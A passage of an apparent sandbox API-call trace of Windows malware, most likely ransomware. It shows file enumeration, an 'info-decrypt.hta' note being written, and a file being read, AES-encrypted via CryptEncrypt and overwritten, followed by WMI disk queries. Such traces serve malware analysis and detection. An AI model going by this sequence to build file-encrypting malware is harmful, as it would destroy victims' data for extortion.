ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a37a2c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a37a2c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xee0, dwReserved0=0x0, dwReserved1=0x0, cFileName="clickonce_bootstrap_unsigned.cdf-ms", cAlternateFileName="CLICKO~1.CDF")) returned 1 [0157.758] FindNextFileW (in: hFindFile=0xb7f490, lpFindFileData=0x949e8c4 | out: lpFindFileData=0x949e8c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6a37a2c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a37a2c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a37a2c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x560, dwReserved0=0x0, dwReserved1=0x0, cFileName="clickonce_bootstrap_unsigned.manifest", cAlternateFileName="CLICKO~1.MAN")) returned 1 [0157.758] FindNextFileW (in: hFindFile=0xb7f490, lpFindFileData=0x949e8c4 | out: lpFindFileData=0x949e8c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a37a2c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a37a2c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a295a80, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x113f58, dwReserved0=0x0, dwReserved1=0x0, cFileName="GoogleUpdateSetup.exe", cAlternateFileName="")) returned 1 [0157.759] FindNextFileW (in: hFindFile=0xb7f490, lpFindFileData=0x949e8c4 | out: lpFindFileData=0x949e8c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a37a2c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a37a2c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a295a80, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x113f58, dwReserved0=0x0, dwReserved1=0x0, cFileName="GoogleUpdateSetup.exe", cAlternateFileName="")) returned 0 [0157.824] FindClose (in: hFindFile=0xb7f490 | out: hFindFile=0xb7f490) returned 1 [0157.967] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949eb4c) returned 1 [0157.967] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949eb58) returned 1 [0157.967] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe", nBufferLength=0x105, lpBuffer=0x949e600, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe", lpFilePart=0x0) returned 0x9d [0157.967] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x949e608, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\info-decrypt.hta", lpFilePart=0x0) returned 0x96 [0157.967] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949ea68) returned 1 [0157.967] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\info-decrypt.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x949eae4 | out: lpFileInformation=0x949eae4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0157.968] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ea64) returned 1 [0157.968] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe", nBufferLength=0x105, lpBuffer=0x949e600, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe", lpFilePart=0x0) returned 0x9d [0157.968] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x949e4a8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\info-decrypt.hta", lpFilePart=0x0) returned 0x96 [0157.968] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949e99c) returned 1 [0157.968] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\info-decrypt.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\info-decrypt.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x328 [0157.969] GetFileType (hFile=0x328) returned 0x1 [0157.969] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949e998) returned 1 [0157.969] GetFileType (hFile=0x328) returned 0x1 [0157.970] WriteFile (in: hFile=0x328, lpBuffer=0x364d0dc*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x949ea60, lpOverlapped=0x0 | out: lpBuffer=0x364d0dc*, lpNumberOfBytesWritten=0x949ea60*=0x1000, lpOverlapped=0x0) returned 1 [0157.970] WriteFile (in: hFile=0x328, lpBuffer=0x364d0dc*, nNumberOfBytesToWrite=0x55e, lpNumberOfBytesWritten=0x949ea34, lpOverlapped=0x0 | out: lpBuffer=0x364d0dc*, lpNumberOfBytesWritten=0x949ea34*=0x55e, lpOverlapped=0x0) returned 1 [0157.970] CloseHandle (hObject=0x328) returned 1 [0157.971] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe", nBufferLength=0x105, lpBuffer=0x949e608, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe", lpFilePart=0x0) returned 0x9d [0157.971] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949eab4) returned 1 [0157.971] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe"), fInfoLevelId=0x0, lpFileInformation=0x364e0f8 | out: lpFileInformation=0x364e0f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x6a37a2c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a37a2c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a307ea0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x3c50)) returned 1 [0157.971] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949eab0) returned 1 [0157.971] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe", nBufferLength=0x105, lpBuffer=0x949e4f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe", lpFilePart=0x0) returned 0x9d [0157.971] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949e9e8) returned 1 [0157.971] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x328 [0157.971] GetFileType (hFile=0x328) returned 0x1 [0157.972] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949e9e4) returned 1 [0157.972] GetFileType (hFile=0x328) returned 0x1 [0157.972] GetFileSize (in: hFile=0x328, lpFileSizeHigh=0x949eaf0 | out: lpFileSizeHigh=0x949eaf0*=0x0) returned 0x3c50 [0157.972] ReadFile (in: hFile=0x328, lpBuffer=0x364e490, nNumberOfBytesToRead=0x3c50, lpNumberOfBytesRead=0x949ea9c, lpOverlapped=0x0 | out: lpBuffer=0x364e490*, lpNumberOfBytesRead=0x949ea9c*=0x3c50, lpOverlapped=0x0) returned 1 [0158.046] CloseHandle (hObject=0x328) returned 1 [0158.046] CryptAcquireContextW (in: phProv=0x949ea3c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x949ea3c*=0xbe09c0) returned 1 [0158.047] CryptGenRandom (in: hProv=0xbe09c0, dwLen=0x10, pbBuffer=0x367d424 | out: pbBuffer=0x367d424) returned 1 [0158.448] CryptImportKey (in: hProv=0xbe09c0, pbData=0x3891de4, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x949ea0c | out: phKey=0x949ea0c*=0xb7f550) returned 1 [0158.448] CryptContextAddRef (hProv=0xbe09c0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0158.448] CryptContextAddRef (hProv=0xbe09c0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0158.448] CryptDuplicateKey (in: hKey=0xb7f550, pdwReserved=0x0, dwFlags=0x0, phKey=0x949e9fc | out: phKey=0x949e9fc*=0xb7f590) returned 1 [0158.448] CryptContextAddRef (hProv=0xbe09c0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0158.448] CryptSetKeyParam (hKey=0xb7f590, dwParam=0x4, pbData=0x3891ec4*=0x1, dwFlags=0x0) returned 1 [0158.448] CryptSetKeyParam (hKey=0xb7f590, dwParam=0x1, pbData=0x3891e90, dwFlags=0x0) returned 1 [0158.448] CryptEncrypt (in: hKey=0xb7f590, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3891ed4*, pdwDataLen=0x949ea68*=0x3c60, dwBufLen=0x3c60 | out: pbData=0x3891ed4*, pdwDataLen=0x949ea68*=0x3c60) returned 1 [0158.448] CryptEncrypt (in: hKey=0xb7f590, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3895b58*, pdwDataLen=0x949ea70*=0x0, dwBufLen=0x10 | out: pbData=0x3895b58*, pdwDataLen=0x949ea70*=0x10) returned 1 [0158.449] CryptDestroyKey (hKey=0xb7f550) returned 1 [0158.450] CryptReleaseContext (hProv=0xbe09c0, dwFlags=0x0) returned 1 [0158.450] CryptReleaseContext (hProv=0xbe09c0, dwFlags=0x0) returned 1 [0158.450] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe", nBufferLength=0x105, lpBuffer=0x949e4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe", lpFilePart=0x0) returned 0x9d [0158.450] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949e9d4) returned 1 [0158.450] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x428 [0158.450] GetFileType (hFile=0x428) returned 0x1 [0158.450] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949e9d0) returned 1 [0158.450] GetFileType (hFile=0x428) returned 0x1 [0158.450] WriteFile (in: hFile=0x428, lpBuffer=0x3896240*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x949ea64, lpOverlapped=0x0 | out: lpBuffer=0x3896240*, lpNumberOfBytesWritten=0x949ea64*=0x20, lpOverlapped=0x0) returned 1 [0159.122] CloseHandle (hObject=0x428) returned 1 [0159.123] CoTaskMemAlloc (cb=0x20c) returned 0x66cc620 [0159.123] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x66cc620 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0159.123] CoTaskMemFree (pv=0x66cc620) [0159.123] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x949e4c8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0159.123] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949ea10 | out: ppv=0x949ea10*=0xb51e34) returned 0x0 [0159.123] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x949ea08 | out: pAptType=0x949ea08*=1) returned 0x0 [0159.123] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x949ea0c | out: ppvObject=0x949ea0c*=0x0) returned 0x80004002 [0159.123] IUnknown:Release (This=0xb51e34) returned 0x1 [0159.124] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e378 | out: ppv=0x949e378*=0x6024b90) returned 0x0 [0159.124] WbemDefPath:IUnknown:QueryInterface (in: This=0x6024b90, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x949e590 | out: ppvObject=0x949e590*=0x0) returned 0x80004002 [0159.125] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6024b90, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e5a4 | out: ppvObject=0x949e5a4*=0x60305c0) returned 0x0 [0159.125] WbemDefPath:IUnknown:Release (This=0x6024b90) returned 0x0 [0159.125] WbemDefPath:IUnknown:QueryInterface (in: This=0x60305c0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e1c4 | out: ppvObject=0x949e1c4*=0x60305c0) returned 0x0 [0159.125] WbemDefPath:IUnknown:QueryInterface (in: This=0x60305c0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x949e180 | out: ppvObject=0x949e180*=0x0) returned 0x80004002 [0159.125] WbemDefPath:IUnknown:AddRef (This=0x60305c0) returned 0x3 [0159.125] WbemDefPath:IUnknown:QueryInterface (in: This=0x60305c0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x949dadc | out: ppvObject=0x949dadc*=0x0) returned 0x80004002 [0159.125] WbemDefPath:IUnknown:QueryInterface (in: This=0x60305c0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x949da8c | out: ppvObject=0x949da8c*=0x0) returned 0x80004002 [0159.125] WbemDefPath:IUnknown:QueryInterface (in: This=0x60305c0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949da98 | out: ppvObject=0x949da98*=0xbb57e8) returned 0x0 [0159.125] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbb57e8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x949daa0 | out: pCid=0x949daa0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0159.125] WbemDefPath:IUnknown:Release (This=0xbb57e8) returned 0x3 [0159.125] CoGetContextToken (in: pToken=0x949daf8 | out: pToken=0x949daf8) returned 0x0 [0159.125] CoGetContextToken (in: pToken=0x949df00 | out: pToken=0x949df00) returned 0x0 [0159.125] WbemDefPath:IUnknown:QueryInterface (in: This=0x60305c0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949df90 | out: ppvObject=0x949df90*=0x0) returned 0x80004002 [0159.125] WbemDefPath:IUnknown:Release (This=0x60305c0) returned 0x2 [0159.125] WbemDefPath:IUnknown:Release (This=0x60305c0) returned 0x1 [0159.125] CoGetContextToken (in: pToken=0x949e888 | out: pToken=0x949e888) returned 0x0 [0159.125] CoGetContextToken (in: pToken=0x949e7e8 | out: pToken=0x949e7e8) returned 0x0 [0159.125] WbemDefPath:IUnknown:QueryInterface (in: This=0x60305c0, riid=0x949e8b8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x949e8b4 | out: ppvObject=0x949e8b4*=0x60305c0) returned 0x0 [0159.125] WbemDefPath:IUnknown:AddRef (This=0x60305c0) returned 0x3 [0159.125] WbemDefPath:IUnknown:Release (This=0x60305c0) returned 0x2 [0159.125] WbemDefPath:IWbemPath:SetText (This=0x60305c0, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0159.125] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60305c0, puCount=0x949ea3c | out: puCount=0x949ea3c*=0x0) returned 0x0 [0159.125] WbemDefPath:IWbemPath:GetText (in: This=0x60305c0, lFlags=2, puBuffLength=0x949ea38*=0x0, pszText=0x0 | out: puBuffLength=0x949ea38*=0x20, pszText=0x0) returned 0x0 [0159.126] WbemDefPath:IWbemPath:GetText (in: This=0x60305c0, lFlags=2, puBuffLength=0x949ea38*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x949ea38*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0159.126] WbemDefPath:IWbemPath:GetInfo (in: This=0x60305c0, uRequestedInfo=0x0, puResponse=0x949ea44 | out: puResponse=0x949ea44*=0xc19) returned 0x0 [0159.126] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60305c0, puCount=0x949ea3c | out: puCount=0x949ea3c*=0x0) returned 0x0 [0159.126] WbemDefPath:IWbemPath:GetInfo (in: This=0x60305c0, uRequestedInfo=0x0, puResponse=0x949ea44 | out: puResponse=0x949ea44*=0xc19) returned 0x0 [0159.126] WbemDefPath:IWbemPath:GetInfo (in: This=0x60305c0, uRequestedInfo=0x0, puResponse=0x949ea44 | out: puResponse=0x949ea44*=0xc19) returned 0x0 [0159.126] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60305c0, puCount=0x949e9bc | out: puCount=0x949e9bc*=0x0) returned 0x0 [0159.126] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60109c0, puCount=0x949e9a8 | out: puCount=0x949e9a8*=0x2) returned 0x0 [0159.126] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x949e9a4*=0x0, pszText=0x0 | out: puBuffLength=0x949e9a4*=0xf, pszText=0x0) returned 0x0 [0159.126] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x949e9a4*=0xf, pszText="00000000000000" | out: puBuffLength=0x949e9a4*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0159.126] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e958 | out: ppv=0x949e958*=0xb51e34) returned 0x0 [0159.126] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x949e950 | out: pAptType=0x949e950*=1) returned 0x0 [0159.126] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x949e954 | out: ppvObject=0x949e954*=0x0) returned 0x80004002 [0159.126] IUnknown:Release (This=0xb51e34) returned 0x1 [0159.127] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e2c0 | out: ppv=0x949e2c0*=0x6024c20) returned 0x0 [0159.127] WbemDefPath:IUnknown:QueryInterface (in: This=0x6024c20, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x949e4d8 | out: ppvObject=0x949e4d8*=0x0) returned 0x80004002 [0159.127] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6024c20, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e4ec | out: ppvObject=0x949e4ec*=0x6030630) returned 0x0 [0159.127] WbemDefPath:IUnknown:Release (This=0x6024c20) returned 0x0 [0159.127] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030630, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e10c | out: ppvObject=0x949e10c*=0x6030630) returned 0x0 [0159.127] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030630, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x949e0c8 | out: ppvObject=0x949e0c8*=0x0) returned 0x80004002 [0159.127] WbemDefPath:IUnknown:AddRef (This=0x6030630) returned 0x3 [0159.127] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030630, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x949da24 | out: ppvObject=0x949da24*=0x0) returned 0x80004002 [0159.127] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030630, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x949d9d4 | out: ppvObject=0x949d9d4*=0x0) returned 0x80004002 